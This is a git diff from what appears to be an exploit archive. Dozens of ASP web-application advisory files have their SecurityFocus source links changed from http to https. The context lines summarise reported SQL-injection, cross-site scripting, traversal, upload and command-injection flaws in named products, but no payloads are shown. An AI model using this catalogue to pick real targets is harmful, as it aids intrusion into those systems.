@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42320/info +source: https://www.securityfocus.com/bid/42320/info Allinta CMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34492.txt b/exploits/asp/webapps/34492.txt index 7ca63215d..9af1fef5d 100644 --- a/exploits/asp/webapps/34492.txt +++ b/exploits/asp/webapps/34492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42535/info +source: https://www.securityfocus.com/bid/42535/info Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34614.txt b/exploits/asp/webapps/34614.txt index f57f27452..1b2b99b3f 100644 --- a/exploits/asp/webapps/34614.txt +++ b/exploits/asp/webapps/34614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43110/info +source: https://www.securityfocus.com/bid/43110/info SmarterTools SmarterStats is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34687.txt b/exploits/asp/webapps/34687.txt index 6dd662938..c9d921386 100644 --- a/exploits/asp/webapps/34687.txt +++ b/exploits/asp/webapps/34687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43370/info +source: https://www.securityfocus.com/bid/43370/info Smart ASP Survey is prone to a SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34936.txt b/exploits/asp/webapps/34936.txt index 46b6df6d6..d574e1c39 100644 --- a/exploits/asp/webapps/34936.txt +++ b/exploits/asp/webapps/34936.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44467/info +source: https://www.securityfocus.com/bid/44467/info i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/34948.txt b/exploits/asp/webapps/34948.txt index f3583d25b..e4eb55ca5 100644 --- a/exploits/asp/webapps/34948.txt +++ b/exploits/asp/webapps/34948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44594/info +source: https://www.securityfocus.com/bid/44594/info Douran Portal is prone to an arbitrary-file-upload vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/34971.txt b/exploits/asp/webapps/34971.txt index c4bffd067..db677fda7 100644 --- a/exploits/asp/webapps/34971.txt +++ b/exploits/asp/webapps/34971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44689/info +source: https://www.securityfocus.com/bid/44689/info Angel Learning Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35031.txt b/exploits/asp/webapps/35031.txt index d3249a66f..0ebba0b56 100644 --- a/exploits/asp/webapps/35031.txt +++ b/exploits/asp/webapps/35031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45121/info +source: https://www.securityfocus.com/bid/45121/info BugTracker.NET is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35045.txt b/exploits/asp/webapps/35045.txt index fe9e3d0a5..89527d82b 100644 --- a/exploits/asp/webapps/35045.txt +++ b/exploits/asp/webapps/35045.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45180/info +source: https://www.securityfocus.com/bid/45180/info DotNetNuke is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35048.txt b/exploits/asp/webapps/35048.txt index 4c910c45b..f159369b3 100644 --- a/exploits/asp/webapps/35048.txt +++ b/exploits/asp/webapps/35048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45201/info +source: https://www.securityfocus.com/bid/45201/info Techno Dreams Articles & Papers Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/35049.txt b/exploits/asp/webapps/35049.txt index 8b5412bf5..a3f9327be 100644 --- a/exploits/asp/webapps/35049.txt +++ b/exploits/asp/webapps/35049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45202/info +source: https://www.securityfocus.com/bid/45202/info Techno Dreams FAQ Manager Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/35065.txt b/exploits/asp/webapps/35065.txt index 5ee897dab..54350f0bb 100644 --- a/exploits/asp/webapps/35065.txt +++ b/exploits/asp/webapps/35065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45257/info +source: https://www.securityfocus.com/bid/45257/info SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35168.txt b/exploits/asp/webapps/35168.txt index 20cc7e959..f7f0219e4 100644 --- a/exploits/asp/webapps/35168.txt +++ b/exploits/asp/webapps/35168.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45681/info +source: https://www.securityfocus.com/bid/45681/info BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35310.txt b/exploits/asp/webapps/35310.txt index 4655c6bcb..76a6954ec 100644 --- a/exploits/asp/webapps/35310.txt +++ b/exploits/asp/webapps/35310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46131/info +source: https://www.securityfocus.com/bid/46131/info Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/35411.txt b/exploits/asp/webapps/35411.txt index 8b86b5bbc..4f7c791e5 100644 --- a/exploits/asp/webapps/35411.txt +++ b/exploits/asp/webapps/35411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46762/info +source: https://www.securityfocus.com/bid/46762/info Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35412.txt b/exploits/asp/webapps/35412.txt index 676282913..15c42bc50 100644 --- a/exploits/asp/webapps/35412.txt +++ b/exploits/asp/webapps/35412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46762/info +source: https://www.securityfocus.com/bid/46762/info Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35576.txt b/exploits/asp/webapps/35576.txt index e9d44e704..877efc769 100644 --- a/exploits/asp/webapps/35576.txt +++ b/exploits/asp/webapps/35576.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47266/info +source: https://www.securityfocus.com/bid/47266/info Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35599.txt b/exploits/asp/webapps/35599.txt index 47bd101a8..8ea2174ea 100644 --- a/exploits/asp/webapps/35599.txt +++ b/exploits/asp/webapps/35599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47291/info +source: https://www.securityfocus.com/bid/47291/info Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/35728.txt b/exploits/asp/webapps/35728.txt index fd0b3da3f..3f6b0247b 100644 --- a/exploits/asp/webapps/35728.txt +++ b/exploits/asp/webapps/35728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47772/info +source: https://www.securityfocus.com/bid/47772/info Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35758.txt b/exploits/asp/webapps/35758.txt index 895acfdd3..d25609e4f 100644 --- a/exploits/asp/webapps/35758.txt +++ b/exploits/asp/webapps/35758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47874/info +source: https://www.securityfocus.com/bid/47874/info Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35807.txt b/exploits/asp/webapps/35807.txt index cceab5be1..98fede60c 100644 --- a/exploits/asp/webapps/35807.txt +++ b/exploits/asp/webapps/35807.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48051/info +source: https://www.securityfocus.com/bid/48051/info Kentico CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35852.txt b/exploits/asp/webapps/35852.txt index 4b082c851..f4c5f5881 100644 --- a/exploits/asp/webapps/35852.txt +++ b/exploits/asp/webapps/35852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48235/info +source: https://www.securityfocus.com/bid/48235/info Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35872.txt b/exploits/asp/webapps/35872.txt index fadae23a7..e2c11dcb8 100644 --- a/exploits/asp/webapps/35872.txt +++ b/exploits/asp/webapps/35872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48384/info +source: https://www.securityfocus.com/bid/48384/info The H3C ER5100 is prone to a remote authentication-bypass vulnerability. diff --git a/exploits/asp/webapps/35923.txt b/exploits/asp/webapps/35923.txt index d616bac58..01d57bbb2 100644 --- a/exploits/asp/webapps/35923.txt +++ b/exploits/asp/webapps/35923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48559/info +source: https://www.securityfocus.com/bid/48559/info Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35926.txt b/exploits/asp/webapps/35926.txt index 0bd5fa348..2e4e10c7c 100644 --- a/exploits/asp/webapps/35926.txt +++ b/exploits/asp/webapps/35926.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48561/info +source: https://www.securityfocus.com/bid/48561/info eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/36001.txt b/exploits/asp/webapps/36001.txt index e30e4964b..4e50bedcf 100644 --- a/exploits/asp/webapps/36001.txt +++ b/exploits/asp/webapps/36001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48930/info +source: https://www.securityfocus.com/bid/48930/info Sitecore CMS is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36010.txt b/exploits/asp/webapps/36010.txt index 4750de8fe..a34fddf9c 100644 --- a/exploits/asp/webapps/36010.txt +++ b/exploits/asp/webapps/36010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48969/info +source: https://www.securityfocus.com/bid/48969/info BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36011.txt b/exploits/asp/webapps/36011.txt index 845bd25b1..c0ad8705d 100644 --- a/exploits/asp/webapps/36011.txt +++ b/exploits/asp/webapps/36011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48970/info +source: https://www.securityfocus.com/bid/48970/info Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36019.txt b/exploits/asp/webapps/36019.txt index 07c29052d..18bdd2f3a 100644 --- a/exploits/asp/webapps/36019.txt +++ b/exploits/asp/webapps/36019.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49022/info +source: https://www.securityfocus.com/bid/49022/info Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36063.txt b/exploits/asp/webapps/36063.txt index 6ee8923ee..c2770128e 100644 --- a/exploits/asp/webapps/36063.txt +++ b/exploits/asp/webapps/36063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49207/info +source: https://www.securityfocus.com/bid/49207/info Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36064.txt b/exploits/asp/webapps/36064.txt index 6945f29d1..2dccc0315 100644 --- a/exploits/asp/webapps/36064.txt +++ b/exploits/asp/webapps/36064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49208/info +source: https://www.securityfocus.com/bid/49208/info Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36065.txt b/exploits/asp/webapps/36065.txt index c8a716f9f..08684d293 100644 --- a/exploits/asp/webapps/36065.txt +++ b/exploits/asp/webapps/36065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49209/info +source: https://www.securityfocus.com/bid/49209/info Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36066.txt b/exploits/asp/webapps/36066.txt index 0064a9c3a..d551f519e 100644 --- a/exploits/asp/webapps/36066.txt +++ b/exploits/asp/webapps/36066.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49210/info +source: https://www.securityfocus.com/bid/49210/info Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36116.txt b/exploits/asp/webapps/36116.txt index 8d78c73b9..b08454409 100644 --- a/exploits/asp/webapps/36116.txt +++ b/exploits/asp/webapps/36116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49468/info +source: https://www.securityfocus.com/bid/49468/info Kisanji is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36133.txt b/exploits/asp/webapps/36133.txt index a8519add5..137421929 100644 --- a/exploits/asp/webapps/36133.txt +++ b/exploits/asp/webapps/36133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49614/info +source: https://www.securityfocus.com/bid/49614/info Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36134.txt b/exploits/asp/webapps/36134.txt index 5d5395aa2..fb1eb5525 100644 --- a/exploits/asp/webapps/36134.txt +++ b/exploits/asp/webapps/36134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49620/info +source: https://www.securityfocus.com/bid/49620/info Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36138.txt b/exploits/asp/webapps/36138.txt index e834c12f9..03a06ab4f 100644 --- a/exploits/asp/webapps/36138.txt +++ b/exploits/asp/webapps/36138.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49667/info +source: https://www.securityfocus.com/bid/49667/info ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/36139.txt b/exploits/asp/webapps/36139.txt index 63009085b..e0d7dab9a 100644 --- a/exploits/asp/webapps/36139.txt +++ b/exploits/asp/webapps/36139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49668/info +source: https://www.securityfocus.com/bid/49668/info Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36141.txt b/exploits/asp/webapps/36141.txt index a2d9c3455..69b840585 100644 --- a/exploits/asp/webapps/36141.txt +++ b/exploits/asp/webapps/36141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49674/info +source: https://www.securityfocus.com/bid/49674/info Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36146.txt b/exploits/asp/webapps/36146.txt index 04f15ce23..9ec131ecd 100644 --- a/exploits/asp/webapps/36146.txt +++ b/exploits/asp/webapps/36146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49712/info +source: https://www.securityfocus.com/bid/49712/info i-Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36284.txt b/exploits/asp/webapps/36284.txt index 0591fc4a5..285c7aef0 100644 --- a/exploits/asp/webapps/36284.txt +++ b/exploits/asp/webapps/36284.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50512/info +source: https://www.securityfocus.com/bid/50512/info CmyDocument is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36375.txt b/exploits/asp/webapps/36375.txt index 3a6a8d987..579e261c8 100644 --- a/exploits/asp/webapps/36375.txt +++ b/exploits/asp/webapps/36375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50841/info +source: https://www.securityfocus.com/bid/50841/info Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface. diff --git a/exploits/asp/webapps/36402.txt b/exploits/asp/webapps/36402.txt index ad493b0c1..6b9f9a0b5 100644 --- a/exploits/asp/webapps/36402.txt +++ b/exploits/asp/webapps/36402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50878/info +source: https://www.securityfocus.com/bid/50878/info Hero is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36515.txt b/exploits/asp/webapps/36515.txt index e5b4ba0c7..89f98a485 100644 --- a/exploits/asp/webapps/36515.txt +++ b/exploits/asp/webapps/36515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51316/info +source: https://www.securityfocus.com/bid/51316/info DIGIT CMS is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/36547.txt b/exploits/asp/webapps/36547.txt index 72e89021e..b4dc40089 100644 --- a/exploits/asp/webapps/36547.txt +++ b/exploits/asp/webapps/36547.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51401/info +source: https://www.securityfocus.com/bid/51401/info MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/36585.txt b/exploits/asp/webapps/36585.txt index 26f556703..1f3895ceb 100644 --- a/exploits/asp/webapps/36585.txt +++ b/exploits/asp/webapps/36585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51596/info +source: https://www.securityfocus.com/bid/51596/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/36588.txt b/exploits/asp/webapps/36588.txt index c07ee3cdd..1141e1170 100644 --- a/exploits/asp/webapps/36588.txt +++ b/exploits/asp/webapps/36588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51608/info +source: https://www.securityfocus.com/bid/51608/info Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/36599.txt b/exploits/asp/webapps/36599.txt index 24c87c406..809e4771a 100644 --- a/exploits/asp/webapps/36599.txt +++ b/exploits/asp/webapps/36599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51631/info +source: https://www.securityfocus.com/bid/51631/info Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/36934.txt b/exploits/asp/webapps/36934.txt index 31ba2c260..7166ecc62 100644 --- a/exploits/asp/webapps/36934.txt +++ b/exploits/asp/webapps/36934.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36935.txt b/exploits/asp/webapps/36935.txt index cdccb6f1f..35ebb0655 100644 --- a/exploits/asp/webapps/36935.txt +++ b/exploits/asp/webapps/36935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/36936.txt b/exploits/asp/webapps/36936.txt index cf4a9efe6..0bef3d3bc 100644 --- a/exploits/asp/webapps/36936.txt +++ b/exploits/asp/webapps/36936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52361/info +source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/37015.txt b/exploits/asp/webapps/37015.txt index 9de3e607b..8e86b1661 100644 --- a/exploits/asp/webapps/37015.txt +++ b/exploits/asp/webapps/37015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52730/info +source: https://www.securityfocus.com/bid/52730/info Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/37119.txt b/exploits/asp/webapps/37119.txt index 5a3af27aa..ee82bb086 100644 --- a/exploits/asp/webapps/37119.txt +++ b/exploits/asp/webapps/37119.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53292/info +source: https://www.securityfocus.com/bid/53292/info XM Forum is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37121.txt b/exploits/asp/webapps/37121.txt index 46d87051d..aea61177a 100644 --- a/exploits/asp/webapps/37121.txt +++ b/exploits/asp/webapps/37121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53298/info +source: https://www.securityfocus.com/bid/53298/info BBSXP CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37222.txt b/exploits/asp/webapps/37222.txt index 867d9df9d..15510f253 100644 --- a/exploits/asp/webapps/37222.txt +++ b/exploits/asp/webapps/37222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53616/info +source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. diff --git a/exploits/asp/webapps/37223.txt b/exploits/asp/webapps/37223.txt index 48f0326ba..95c6b7ace 100644 --- a/exploits/asp/webapps/37223.txt +++ b/exploits/asp/webapps/37223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53616/info +source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. diff --git a/exploits/asp/webapps/37488.txt b/exploits/asp/webapps/37488.txt index 00580964d..772967292 100644 --- a/exploits/asp/webapps/37488.txt +++ b/exploits/asp/webapps/37488.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54346/info +source: https://www.securityfocus.com/bid/54346/info WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37577.txt b/exploits/asp/webapps/37577.txt index 6a8734b9e..e81539d11 100644 --- a/exploits/asp/webapps/37577.txt +++ b/exploits/asp/webapps/37577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54817/info +source: https://www.securityfocus.com/bid/54817/info PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37676.txt b/exploits/asp/webapps/37676.txt index e6af02310..67a116b9e 100644 --- a/exploits/asp/webapps/37676.txt +++ b/exploits/asp/webapps/37676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55216/info +source: https://www.securityfocus.com/bid/55216/info Power-eCommerce is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37678.txt b/exploits/asp/webapps/37678.txt index 36816884d..54907381d 100644 --- a/exploits/asp/webapps/37678.txt +++ b/exploits/asp/webapps/37678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55220/info +source: https://www.securityfocus.com/bid/55220/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37689.txt b/exploits/asp/webapps/37689.txt index bc8d400ff..e9a15ea97 100644 --- a/exploits/asp/webapps/37689.txt +++ b/exploits/asp/webapps/37689.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55299/info +source: https://www.securityfocus.com/bid/55299/info XM Forum is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/37696.txt b/exploits/asp/webapps/37696.txt index b4738ce1e..1945b877c 100644 --- a/exploits/asp/webapps/37696.txt +++ b/exploits/asp/webapps/37696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55395/info +source: https://www.securityfocus.com/bid/55395/info Cm3 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/37995.txt b/exploits/asp/webapps/37995.txt index 242799b53..bc6c853a1 100644 --- a/exploits/asp/webapps/37995.txt +++ b/exploits/asp/webapps/37995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56342/info +source: https://www.securityfocus.com/bid/56342/info SolarWinds Orion IP Address Manager (IPAM) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38318.txt b/exploits/asp/webapps/38318.txt index 7605bceaf..da3f8fc9e 100644 --- a/exploits/asp/webapps/38318.txt +++ b/exploits/asp/webapps/38318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58012/info +source: https://www.securityfocus.com/bid/58012/info MIMEsweeper for SMTP is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/38415.txt b/exploits/asp/webapps/38415.txt index b5d3592f9..dad98a411 100644 --- a/exploits/asp/webapps/38415.txt +++ b/exploits/asp/webapps/38415.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58838/info +source: https://www.securityfocus.com/bid/58838/info C2 WebResource is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38479.txt b/exploits/asp/webapps/38479.txt index e7f989b7c..e8d7e4d0a 100644 --- a/exploits/asp/webapps/38479.txt +++ b/exploits/asp/webapps/38479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59290/info +source: https://www.securityfocus.com/bid/59290/info Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38653.txt b/exploits/asp/webapps/38653.txt index 7d03b3e64..5a826d88d 100644 --- a/exploits/asp/webapps/38653.txt +++ b/exploits/asp/webapps/38653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61152/info +source: https://www.securityfocus.com/bid/61152/info Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38655.txt b/exploits/asp/webapps/38655.txt index 25d13bd55..83a05f36f 100644 --- a/exploits/asp/webapps/38655.txt +++ b/exploits/asp/webapps/38655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61156/info +source: https://www.securityfocus.com/bid/61156/info Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/38696.txt b/exploits/asp/webapps/38696.txt index b7c7925fb..9a65705a9 100644 --- a/exploits/asp/webapps/38696.txt +++ b/exploits/asp/webapps/38696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61770/info +source: https://www.securityfocus.com/bid/61770/info DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/asp/webapps/38749.txt b/exploits/asp/webapps/38749.txt index c807b7a93..eef782897 100644 --- a/exploits/asp/webapps/38749.txt +++ b/exploits/asp/webapps/38749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62186/info +source: https://www.securityfocus.com/bid/62186/info Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/38879.txt b/exploits/asp/webapps/38879.txt index 32c0fab27..8dfc471ee 100644 --- a/exploits/asp/webapps/38879.txt +++ b/exploits/asp/webapps/38879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64332/info +source: https://www.securityfocus.com/bid/64332/info B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/38883.txt b/exploits/asp/webapps/38883.txt index 638754b37..ce542e3f2 100644 --- 